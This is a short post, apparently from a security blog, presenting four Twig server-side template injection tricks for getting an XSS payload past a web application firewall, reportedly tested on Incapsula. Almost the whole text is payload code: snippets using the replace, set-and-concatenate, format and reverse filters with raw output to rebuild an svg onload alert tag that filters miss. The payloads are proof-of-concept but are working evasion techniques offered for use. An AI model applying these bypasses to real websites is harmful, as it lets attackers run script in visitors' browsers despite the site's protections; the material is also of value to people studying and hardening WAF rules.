TLDR : SSTI in Twig can be exploited to bypass WAF.

Twig allows multiple string iteration attributes which can be very helpful while deceiving Web Application Firewall

Tested WAF : Incapsula

Bypass #1 : replace attribute

Payload :

{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}

Bypass #2 : set attribute to define variables and then concatinating them

{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}

raw attribute prevents the string from being encoded

Bypass #3 : format attribute works pretty much like printf

{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}

Bypass #4 : :reverse attribute

{{'>)1(trela=daolno gvs<'|reverse|raw}}

Link : TwigFiddle